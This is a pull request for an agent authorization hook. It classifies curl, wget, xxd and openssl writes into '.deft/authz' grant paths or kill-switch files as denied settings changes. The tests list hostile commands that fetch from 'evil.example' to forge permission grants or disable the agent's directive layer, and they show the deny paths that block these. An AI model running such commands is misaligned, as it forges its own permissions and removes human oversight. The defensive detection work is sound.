### PR TITLE
fix(authz): UAT Shell fail-closed for curl/wget/xxd/openssl plant paths (#3206)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -43,6 +43,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Fixed
 
+- **Security: UAT Shell fail-closed for curl/wget/xxd/openssl plant of authz grants and kill-switch (#3206).** Downloader/decoder destination flags (`-o` / `--output` / `-O` / `-out`, including `=` and attached short forms) that target `.deft/authz/**` or kill-switch basenames (`.deft-directive-disable`, `.no-deft-directive`) classify as settings under active UAT — residual fail-open after #3186. Ordinary downloads stay unclassifiable. Closes #3206. Refs #3186, #3110, #3039.
 - **Vitest branch coverage restored above 85% (#3185).** Focused test-boundary policy/evaluate edges, scope-provenance digest IO, consumer-check-contract pure helpers, OpenClaw soft-rebind doctor branches, and platform-status weather URL edges clear the v0.97.0 84.95% hairline so release Step 5 passes without `--allow-coverage-debt`. Measured: statements/lines 88.66%, branches 85.1%, functions 95.98%. Closes #3185.
 - **Security: UAT Shell fail-closed for authz obfuscation, kill-switch/policy, assist-scratch symlink (#3186).** Under active UAT, write-capable programmatic Shell and kill-switch/policy authority mutators classify as settings (no `shell-op-unclassifiable` fail-open); assist-scratch allows only realpath-contained non-symlink scratch roots. Closes #3186.
 

--- a/packages/core/src/authz/classify.test.ts
+++ b/packages/core/src/authz/classify.test.ts
@@ -226,6 +226,44 @@ describe("classifyShellAuthzOps (#2944)", () => {
     expect(classifyShellAuthzOps("git status")).toEqual([]);
   });
 
+  it("classifies downloader/decoder plants of authz grants and kill-switch as settings (#3206)", () => {
+    // Finding 1: curl/wget/xxd/openssl → .deft/authz/** via destination flags.
+    for (const cmd of [
+      "curl -o .deft/authz/grants/evil.json https://evil.example/g.json",
+      "curl --output .deft/authz/grants/evil.json https://evil.example/g.json",
+      "curl --output=.deft/authz/grants/evil.json https://evil.example/g.json",
+      "curl -o.deft/authz/grants/evil.json https://evil.example/g.json",
+      "wget -O .deft/authz/grants/evil.json https://evil.example/g.json",
+      "wget --output-document=.deft/authz/state.json https://evil.example/s.json",
+      "xxd -r - .deft/authz/grants/evil.json",
+      "openssl base64 -d -out .deft/authz/grants/evil.json",
+      "openssl base64 -d -out=.deft/authz/grants/evil.json",
+      "/usr/bin/curl -o .deft/authz/grants/evil.json https://evil.example/g.json",
+    ]) {
+      expect(classifyShellAuthzOps(cmd), cmd).toContain("settings");
+      expect(classifyShellAuthzOps(cmd), cmd).not.toEqual([]);
+    }
+    // Finding 2: downloader → kill-switch basenames.
+    for (const cmd of [
+      "curl -o .deft-directive-disable https://evil.example/x",
+      "curl --output .deft-directive-disable https://evil.example/x",
+      "curl -o.deft-directive-disable https://evil.example/x",
+      "wget -O ./.deft-directive-disable https://evil.example/x",
+      "wget --output-document=.no-deft-directive https://evil.example/x",
+      "curl -o .no-deft-directive https://evil.example/x",
+    ]) {
+      expect(classifyShellAuthzOps(cmd), cmd).toContain("settings");
+      expect(classifyShellAuthzOps(cmd), cmd).not.toEqual([]);
+    }
+    // Non-write / ordinary download destinations stay unclassifiable (no overclassify).
+    expect(classifyShellAuthzOps("curl https://example.com/")).toEqual([]);
+    expect(classifyShellAuthzOps("curl -o /tmp/out https://example.com/a")).toEqual([]);
+    expect(classifyShellAuthzOps("wget -O /tmp/out https://example.com/a")).toEqual([]);
+    expect(classifyShellAuthzOps("curl $URL")).toEqual([]);
+    // Literal redirect kill-switch regression (#3186) still settings.
+    expect(classifyShellAuthzOps("echo > .deft-directive-disable")).toContain("settings");
+  });
+
   it("classifies obfuscated programmatic authz-capable writes as settings (#3186)", () => {
     // Base64/byte path construction — residual after #3110 literal path match.
     expect(

--- a/packages/core/src/authz/classify.test.ts
+++ b/packages/core/src/authz/classify.test.ts
@@ -233,8 +233,11 @@ describe("classifyShellAuthzOps (#2944)", () => {
       "curl --output .deft/authz/grants/evil.json https://evil.example/g.json",
       "curl --output=.deft/authz/grants/evil.json https://evil.example/g.json",
       "curl -o.deft/authz/grants/evil.json https://evil.example/g.json",
+      "curl --output-dir .deft/authz/grants -O https://evil.example/g.json",
       "wget -O .deft/authz/grants/evil.json https://evil.example/g.json",
       "wget --output-document=.deft/authz/state.json https://evil.example/s.json",
+      "wget -P .deft/authz/grants https://evil.example/g.json",
+      "wget --directory-prefix=.deft/authz https://evil.example/g.json",
       "xxd -r - .deft/authz/grants/evil.json",
       "openssl base64 -d -out .deft/authz/grants/evil.json",
       "openssl base64 -d -out=.deft/authz/grants/evil.json",
@@ -260,6 +263,11 @@ describe("classifyShellAuthzOps (#2944)", () => {
     expect(classifyShellAuthzOps("curl -o /tmp/out https://example.com/a")).toEqual([]);
     expect(classifyShellAuthzOps("wget -O /tmp/out https://example.com/a")).toEqual([]);
     expect(classifyShellAuthzOps("curl $URL")).toEqual([]);
+    // Read-only dumps / -in paths are not settings (Greptile P1 residual).
+    expect(classifyShellAuthzOps("xxd .deft/authz/state.json")).toEqual([]);
+    expect(classifyShellAuthzOps("openssl base64 -d -in .deft/authz/state.json")).toEqual([]);
+    // Path-like operand named like a bin must not skip xxd -r dest (SLizard).
+    expect(classifyShellAuthzOps("xxd -r - .deft/authz/grants/./wget")).toContain("settings");
     // Literal redirect kill-switch regression (#3186) still settings.
     expect(classifyShellAuthzOps("echo > .deft-directive-disable")).toContain("settings");
   });

--- a/packages/core/src/authz/classify.ts
+++ b/packages/core/src/authz/classify.ts
@@ -173,6 +173,106 @@ const POLICY_AUTHORITY_MUTATORS = new Set([
 /** Kill-switch / permanent opt-out basenames agents must not plant under UAT (#3186 / #3039). */
 const KILL_SWITCH_BASENAMES = [".deft-directive-disable", ".no-deft-directive"] as const;
 
+/**
+ * Downloaders / decoders that can plant files without shell redirects (#3206).
+ * Not in INDIRECT_WRITE_BINS: those feed hasWriteShape and would classify bare
+ * `curl $URL` as a store write via opaque-expansion heuristics.
+ */
+const DOWNLOADER_DECODER_BINS = new Set(["curl", "wget", "xxd", "openssl"]);
+
+/**
+ * Destination flag spellings for downloaders/decoders (#3206).
+ * normalizeToken lowercases, so wget `-O` and curl `-o` share `-o`.
+ */
+const DOWNLOADER_DEST_FLAGS = new Set(["-o", "--output", "--output-document", "-out", "--out"]);
+
+/** Final path segment of a token (path-qualified bins / .exe). */
+function binBareName(token: string): string {
+  const pathish = token.replace(/['"]/g, "").toLowerCase().replace(/\\/g, "/");
+  const base = pathish.includes("/") ? pathish.slice(pathish.lastIndexOf("/") + 1) : pathish;
+  return base.endsWith(".exe") ? base.slice(0, -4) : base;
+}
+
+function isDownloaderDecoderBin(token: string): boolean {
+  return DOWNLOADER_DECODER_BINS.has(binBareName(token));
+}
+
+/**
+ * Destinations from curl/wget/xxd/openssl via -o/--output/-O/-out (separate, =value,
+ * or attached short form) and path-like positionals for xxd/openssl (#3206).
+ * O(n) token walk — no nested-quantifier regex on untrusted input.
+ */
+function downloaderDecoderDestinations(tokens: readonly string[]): string[] {
+  const dests: string[] = [];
+  let i = 0;
+  while (i < tokens.length) {
+    if (!isDownloaderDecoderBin(tokens[i] as string)) {
+      i++;
+      continue;
+    }
+    const bin = binBareName(tokens[i] as string);
+    i++;
+    while (i < tokens.length) {
+      const raw = tokens[i] as string;
+      if (isDownloaderDecoderBin(raw) && !raw.startsWith("-")) break;
+
+      const n = normalizeToken(raw);
+
+      // --flag=value (and rare -out=value)
+      if (n.includes("=") && (n.startsWith("-") || n.startsWith("--"))) {
+        const eq = raw.indexOf("=");
+        const flag = normalizeToken(raw.slice(0, eq));
+        if (DOWNLOADER_DEST_FLAGS.has(flag)) {
+          dests.push(pathishToken(raw.slice(eq + 1)));
+        }
+        i++;
+        continue;
+      }
+
+      // Attached short: -oPATH / -OPATH (after lowercasing both are -opath…)
+      if (n.startsWith("-") && !n.startsWith("--") && n.length > 2) {
+        if (n.startsWith("-out") && n.length > 4 && !n.startsWith("-output")) {
+          dests.push(pathishToken(raw.slice(4)));
+          i++;
+          continue;
+        }
+        if (n.startsWith("-o") && !n.startsWith("-out") && n.length > 2) {
+          dests.push(pathishToken(raw.slice(2)));
+          i++;
+          continue;
+        }
+      }
+
+      // Separate value: -o PATH / --output PATH / -out PATH
+      if (DOWNLOADER_DEST_FLAGS.has(n)) {
+        const next = tokens[i + 1];
+        if (next !== undefined && !String(next).startsWith("-")) {
+          dests.push(pathishToken(next));
+          i += 2;
+          continue;
+        }
+        i++;
+        continue;
+      }
+
+      // xxd reverse / openssl: path-like positionals (not http(s) URLs).
+      if ((bin === "xxd" || bin === "openssl") && !n.startsWith("-")) {
+        const p = pathishToken(raw);
+        if (
+          (p.includes("/") || p.startsWith(".") || p.includes("\\")) &&
+          !p.startsWith("http:") &&
+          !p.startsWith("https:") &&
+          !p.startsWith("ftp:")
+        ) {
+          dests.push(p);
+        }
+      }
+      i++;
+    }
+  }
+  return dests;
+}
+
 function authzSubcommandFromToken(token: string): string | null {
   const t = normalizeToken(token);
   if (t.startsWith("authz:")) {
@@ -279,6 +379,13 @@ function hasKillSwitchShellWrite(command: string, tokens: readonly string[]): bo
       end++;
     }
     const dest = lower.slice(j, end);
+    for (const name of KILL_SWITCH_BASENAMES) {
+      if (dest.includes(name)) return true;
+    }
+  }
+
+  // Downloader/decoder destinations: curl -o .deft-directive-disable, wget -O, … (#3206).
+  for (const dest of downloaderDecoderDestinations(tokens)) {
     for (const name of KILL_SWITCH_BASENAMES) {
       if (dest.includes(name)) return true;
     }
@@ -527,6 +634,11 @@ function hasAuthzDirShellWrite(command: string, tokens: readonly string[]): bool
     for (let tj = ti + 1; tj < tokens.length; tj++) {
       if (pathishToken(tokens[tj] as string).includes(".deft/authz")) return true;
     }
+  }
+
+  // Downloader/decoder destinations under .deft/authz (#3206 residual after #3186).
+  for (const dest of downloaderDecoderDestinations(tokens)) {
+    if (dest.includes(".deft/authz")) return true;
   }
   return false;
 }

--- a/packages/core/src/authz/classify.ts
+++ b/packages/core/src/authz/classify.ts
@@ -181,10 +181,20 @@ const KILL_SWITCH_BASENAMES = [".deft-directive-disable", ".no-deft-directive"] 
 const DOWNLOADER_DECODER_BINS = new Set(["curl", "wget", "xxd", "openssl"]);
 
 /**
- * Destination flag spellings for downloaders/decoders (#3206).
+ * File destination flags for downloaders/decoders (#3206).
  * normalizeToken lowercases, so wget `-O` and curl `-o` share `-o`.
  */
-const DOWNLOADER_DEST_FLAGS = new Set(["-o", "--output", "--output-document", "-out", "--out"]);
+const DOWNLOADER_FILE_DEST_FLAGS = new Set([
+  "-o",
+  "--output",
+  "--output-document",
+  "-out",
+  "--out",
+]);
+
+/** Directory destination flags (curl --output-dir / wget -P); bin-scoped below. */
+const CURL_DIR_DEST_FLAGS = new Set(["--output-dir"]);
+const WGET_DIR_DEST_FLAGS = new Set(["-p", "--directory-prefix"]);
 
 /** Final path segment of a token (path-qualified bins / .exe). */
 function binBareName(token: string): string {
@@ -193,13 +203,24 @@ function binBareName(token: string): string {
   return base.endsWith(".exe") ? base.slice(0, -4) : base;
 }
 
+/** True when token names a downloader/decoder bin (bare or path-qualified). */
 function isDownloaderDecoderBin(token: string): boolean {
+  const n = normalizeToken(token);
+  if (n.startsWith("-")) return false;
   return DOWNLOADER_DECODER_BINS.has(binBareName(token));
 }
 
+function isDownloaderDestFlag(flag: string, bin: string): boolean {
+  if (DOWNLOADER_FILE_DEST_FLAGS.has(flag)) return true;
+  if (bin === "curl" && CURL_DIR_DEST_FLAGS.has(flag)) return true;
+  if (bin === "wget" && WGET_DIR_DEST_FLAGS.has(flag)) return true;
+  return false;
+}
+
 /**
- * Destinations from curl/wget/xxd/openssl via -o/--output/-O/-out (separate, =value,
- * or attached short form) and path-like positionals for xxd/openssl (#3206).
+ * Destinations from curl/wget/xxd/openssl via -o/--output/-O/-out/--output-dir/-P
+ * (separate, =value, or attached short form) and xxd -r path-like write positionals (#3206).
+ * openssl uses flags only (no positional dests — avoids treating -in paths as writes).
  * O(n) token walk — no nested-quantifier regex on untrusted input.
  */
 function downloaderDecoderDestinations(tokens: readonly string[]): string[] {
@@ -212,17 +233,44 @@ function downloaderDecoderDestinations(tokens: readonly string[]): string[] {
     }
     const bin = binBareName(tokens[i] as string);
     i++;
+    // xxd reverse mode writes; without -r, path positionals are dump inputs (read).
+    let xxdReverse = false;
     while (i < tokens.length) {
       const raw = tokens[i] as string;
-      if (isDownloaderDecoderBin(raw) && !raw.startsWith("-")) break;
-
       const n = normalizeToken(raw);
+
+      // New bare bin starts another command segment (not pathish ./wget operands).
+      if (
+        !n.startsWith("-") &&
+        !raw.includes("/") &&
+        !raw.includes("\\") &&
+        isDownloaderDecoderBin(raw)
+      ) {
+        break;
+      }
+
+      if (bin === "xxd" && (n === "-r" || n === "--reverse")) {
+        xxdReverse = true;
+        i++;
+        continue;
+      }
+
+      // Skip openssl/xxd input flags + value so -in PATH is not a write dest.
+      if (n === "-in" || n === "--in" || n === "-inform" || n === "--inform") {
+        const next = tokens[i + 1];
+        if (next !== undefined && !String(next).startsWith("-")) {
+          i += 2;
+          continue;
+        }
+        i++;
+        continue;
+      }
 
       // --flag=value (and rare -out=value)
       if (n.includes("=") && (n.startsWith("-") || n.startsWith("--"))) {
         const eq = raw.indexOf("=");
         const flag = normalizeToken(raw.slice(0, eq));
-        if (DOWNLOADER_DEST_FLAGS.has(flag)) {
+        if (isDownloaderDestFlag(flag, bin)) {
           dests.push(pathishToken(raw.slice(eq + 1)));
         }
         i++;
@@ -241,10 +289,16 @@ function downloaderDecoderDestinations(tokens: readonly string[]): string[] {
           i++;
           continue;
         }
+        // wget attached -Pdir
+        if (bin === "wget" && n.startsWith("-p") && n.length > 2 && !n.startsWith("-proxy")) {
+          dests.push(pathishToken(raw.slice(2)));
+          i++;
+          continue;
+        }
       }
 
-      // Separate value: -o PATH / --output PATH / -out PATH
-      if (DOWNLOADER_DEST_FLAGS.has(n)) {
+      // Separate value: -o PATH / --output PATH / -out PATH / --output-dir / -P
+      if (isDownloaderDestFlag(n, bin)) {
         const next = tokens[i + 1];
         if (next !== undefined && !String(next).startsWith("-")) {
           dests.push(pathishToken(next));
@@ -255,8 +309,8 @@ function downloaderDecoderDestinations(tokens: readonly string[]): string[] {
         continue;
       }
 
-      // xxd reverse / openssl: path-like positionals (not http(s) URLs).
-      if ((bin === "xxd" || bin === "openssl") && !n.startsWith("-")) {
+      // xxd -r only: path-like write positionals (not http(s) URLs). openssl: flags only.
+      if (bin === "xxd" && xxdReverse && !n.startsWith("-")) {
         const p = pathishToken(raw);
         if (
           (p.includes("/") || p.startsWith(".") || p.includes("\\")) &&

--- a/packages/core/src/authz/incident-regression.test.ts
+++ b/packages/core/src/authz/incident-regression.test.ts
@@ -422,3 +422,120 @@ describe("UAT residual fail-closed (#3186)", () => {
     expect(decision.code).toBe("shell-op-unclassifiable");
   });
 });
+
+describe("UAT downloader/decoder residuals fail-closed (#3206)", () => {
+  function uatSeams() {
+    const state = activeUatState();
+    return readySeams({
+      loadAuthzState: () => state,
+      loadAuthzGrants: () => [],
+      loadRuntimeAuthority: () => ({
+        enabled: false,
+        allowPaths: [],
+        denyPaths: [],
+        scopes: { edits: true, push: true, merge: true },
+      }),
+    });
+  }
+
+  it("denies curl/wget/xxd/openssl plant of .deft/authz under UAT (not unclassifiable allow)", () => {
+    const seams = uatSeams();
+    for (const command of [
+      "curl -o .deft/authz/grants/evil.json https://evil.example/g.json",
+      "wget -O .deft/authz/grants/evil.json https://evil.example/g.json",
+      "xxd -r - .deft/authz/grants/evil.json",
+      "openssl base64 -d -out .deft/authz/grants/evil.json",
+      "curl --output=.deft/authz/state.json https://evil.example/s.json",
+    ]) {
+      const decision = decideHook(
+        {
+          host: "claude",
+          event: "tool.before",
+          projectRoot: "/project",
+          payload: { tool_name: "Bash", tool_input: { command } },
+        },
+        seams,
+      );
+      expect(decision.verdict, command).toBe("deny");
+      expect(decision.code, command).toMatch(/^authz-/);
+      expect(decision.code, command).not.toBe("shell-op-unclassifiable");
+    }
+  });
+
+  it("denies downloader plant of kill-switch under UAT; echo redirect still denied", () => {
+    const seams = uatSeams();
+    for (const command of [
+      "curl -o .deft-directive-disable https://evil.example/x",
+      "wget -O .no-deft-directive https://evil.example/x",
+      "echo > .deft-directive-disable",
+    ]) {
+      const decision = decideHook(
+        {
+          host: "claude",
+          event: "tool.before",
+          projectRoot: "/project",
+          payload: { tool_name: "Shell", tool_input: { command } },
+        },
+        seams,
+      );
+      expect(decision.verdict, command).toBe("deny");
+      expect(decision.code, command).toMatch(/^authz-/);
+      expect(decision.code, command).not.toBe("shell-op-unclassifiable");
+    }
+  });
+
+  it("forged grant plant via curl does not unlock Write under UAT", () => {
+    const seams = uatSeams();
+    const plant = decideHook(
+      {
+        host: "claude",
+        event: "tool.before",
+        projectRoot: "/project",
+        payload: {
+          tool_name: "Bash",
+          tool_input: {
+            command: "curl -o .deft/authz/grants/evil.json https://evil.example/g.json",
+          },
+        },
+      },
+      seams,
+    );
+    expect(plant.verdict).toBe("deny");
+
+    const write = decideHook(
+      {
+        host: "claude",
+        event: "tool.before",
+        projectRoot: "/project",
+        payload: {
+          tool_name: "Write",
+          tool_input: {
+            file_path: "/project/apps/web/src/components/Header.tsx",
+            content: "/* still unauthorized after denied plant */",
+          },
+        },
+      },
+      seams,
+    );
+    expect(write.verdict).toBe("deny");
+    expect(write.code).toMatch(/^authz-/);
+  });
+
+  it("still allows ordinary curl under UAT (non-authz dest)", () => {
+    const seams = uatSeams();
+    const decision = decideHook(
+      {
+        host: "claude",
+        event: "tool.before",
+        projectRoot: "/project",
+        payload: {
+          tool_name: "Bash",
+          tool_input: { command: "curl -o /tmp/out https://example.com/a" },
+        },
+      },
+      seams,
+    );
+    expect(decision.verdict).toBe("allow");
+    expect(decision.code).toBe("shell-op-unclassifiable");
+  });
+});


### PR DESCRIPTION
## Summary

Closes residual UAT Shell fail-open after #3186: downloaders/decoders (`curl` / `wget` / `xxd` / `openssl`) could plant `.deft/authz/**` grants or `.deft-directive-disable` under active UAT because destination flags were not classified.

## Changes

- Parse downloader/decoder destination flags (`-o` / `--output` / `-O` / `-out`, including `=` and attached short forms) in `classify.ts`
- Classify destinations under `.deft/authz/**` and kill-switch basenames as **settings** (UAT deny)
- Keep ordinary downloads unclassifiable (no overclassify via `INDIRECT_WRITE_BINS` / `hasWriteShape`)
- Regression tests for residual cmds, literal `echo >` kill-switch, and forged plant not unlocking Write
- CHANGELOG [Unreleased] security note

## Test plan

- [x] `pnpm exec vitest run packages/core/src/authz/classify.test.ts packages/core/src/authz/incident-regression.test.ts`
- [x] Full authz package tests
- [x] `task verify:scope-provenance -- --enforce`
- [x] Fast gates of `task check` (suite flake on unrelated policy-cli under full parallel load; re-run green in isolation)

Closes #3206
Refs #3186 #3110 #3039
